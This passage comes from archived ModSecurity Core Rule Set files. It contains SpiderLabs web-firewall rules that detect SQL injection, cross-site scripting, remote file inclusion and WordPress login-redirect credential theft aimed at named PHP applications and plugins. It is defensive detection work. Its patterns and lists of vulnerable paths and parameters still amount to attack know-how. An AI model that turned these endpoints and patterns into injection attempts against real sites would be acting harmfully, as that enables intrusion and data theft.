Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012749) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpRS id parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /model-kits.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012749,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS phpRS id parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpRS id parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012792) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS KLINK txtCodiInfo parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /interna.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012792,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS KLINK txtCodiInfo parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:txtCodiInfo/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS KLINK txtCodiInfo parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012833) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_hello UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012833,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_hello UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_hello" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:secid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_hello UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012876) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TCExam tce_xml_user_results.php script UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /admin/code/tce_xml_user_results.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012876,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS TCExam tce_xml_user_results.php script UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:startdate/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TCExam tce_xml_user_results.php script UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2012991) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TEDE Simplificado processaPesquisa.php script UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /tde_busca/processaPesquisa.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012991,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS TEDE Simplificado processaPesquisa.php script UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TEDE Simplificado processaPesquisa.php script UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2013084) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP link Directory sbcat_id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /showcats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013084,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS PHP link Directory sbcat_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,46048'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:sbcat_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP link Directory sbcat_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2013129) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SoftMP3 search Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /minbrowse.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013129,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SoftMP3 search Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:search/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SoftMP3 search Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2013159) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/flash-album-gallery/lib/hitcounter.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013159,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:pid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress plugin Flash Album Gallery pid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2013231) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Immophp annonce parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /annonce_detail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013231,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Immophp annonce parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,48341'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:annonce/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Immophp annonce parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2013307) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nuke Evolution Xtreme pid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /modules.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013307,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Nuke Evolution Xtreme pid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains name=Tutorials" "chain" SecRule REQUEST_LINE "@contains t_op=showtutorial" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:pid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nuke Evolution Xtreme pid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2013471) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2013471,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_community" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:userid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Community component userid parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" SecMarker END_SLR_ET_SQLI_RULES ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_crs_46_slr_et_wordpress_attacks.conf�0000664�0000000�0000000�00000262141�12164572564�0034334�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This ruleset was created by Trustwave SpiderLabs Research Team and includes data from: # # http://www.emergingthreats.net/ # SecRule REQUEST_FILENAME "!@pmFromFile modsecurity_46_slr_et_wordpress.data" "id:'2000005',phase:2,nolog,pass,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,skipAfter:END_SLR_ET_WORDPRESS_RULES" # (2011256) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-ip.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/firestats/php/window-add-excluded-ip.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011256,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-ip.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:edit "(?i:edit\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FireStats window-add-excluded-ip.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2011257) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-url.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/firestats/php/window-add-excluded-url.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011257,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FireStats window-add-excluded-url.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:edit "(?i:edit\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FireStats window-add-excluded-url.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2011258) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FireStats window-new-edit-site.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/firestats/php/window-new-edit-site.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011258,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FireStats window-new-edit-site.php Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule ARGS:site_id "(?i:site_id\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FireStats window-new-edit-site.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005152) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines SELECT SecRule REQUEST_LINE "@contains /rss/show_webfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005152,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22282'" SecRule ARGS:wcHeadlines "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005153) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UNION SELECT SecRule REQUEST_LINE "@contains /rss/show_webfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005153,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22282'" SecRule ARGS:wcHeadlines "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005155) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines INSERT SecRule REQUEST_LINE "@contains /rss/show_webfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005155,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22282'" SecRule ARGS:wcHeadlines "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005154) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines DELETE SecRule REQUEST_LINE "@contains /rss/show_webfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005154,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22282'" SecRule ARGS:wcHeadlines "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005156) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines ASCII SecRule REQUEST_LINE "@contains /rss/show_webfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005156,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22282'" SecRule ARGS:wcHeadlines "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005157) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UPDATE SecRule REQUEST_LINE "@contains /rss/show_webfeed.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005157,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22282'" SecRule ARGS:wcHeadlines "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SpoonLabs Vivvo Article Management CMS (phpWordPress) SQL Injection Attempt -- show_webfeed.php wcHeadlines UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2003508) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress wp-login.php redirect_to credentials stealing attempt SecRule REQUEST_LINE "@contains /wp-login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003508,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress wp-login.php redirect_to credentials stealing attempt',tag:'web-application-attack',tag:'url,www.inliniac.net/blog/?p=71'" SecRule QUERY_STRING|REQUEST_BODY "(?i:redirect_to=(ht|f)tps?\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress wp-login.php redirect_to credentials stealing attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2003685) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wptable-button.php wpPATH SecRule REQUEST_LINE "@contains /js/wptable-button.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003685,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wptable-button.php wpPATH',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3824'" SecRule ARGS:wpPATH "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wptable-button.php wpPATH',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2003686) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wordtube-button.php wpPATH SecRule REQUEST_LINE "@contains /wordtube-button.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003686,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wordtube-button.php wpPATH',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3825'" SecRule ARGS:wpPATH "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wordtube-button.php wpPATH',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2003885) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XSS Attempt -- sidebar.php SecRule REQUEST_LINE "@contains /sidebar.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003885,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XSS Attempt -- sidebar.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467360/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XSS Attempt -- sidebar.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004011) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie SELECT SecRule REQUEST_LINE "@contains /wp-admin/admin-ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004011,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24076'" SecRule ARGS:cookie "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004012) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UNION SELECT SecRule REQUEST_LINE "@contains /wp-admin/admin-ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004012,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24076'" SecRule ARGS:cookie "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004013) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie INSERT SecRule REQUEST_LINE "@contains /wp-admin/admin-ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004013,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24076'" SecRule ARGS:cookie "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004014) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie DELETE SecRule REQUEST_LINE "@contains /wp-admin/admin-ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004014,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24076'" SecRule ARGS:cookie "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004015) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie ASCII SecRule REQUEST_LINE "@contains /wp-admin/admin-ajax.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004015,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- admin-ajax.php cookie ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24076'" SecRule ARGS:cookie "(?i:ASCII\(.+SELECT)" 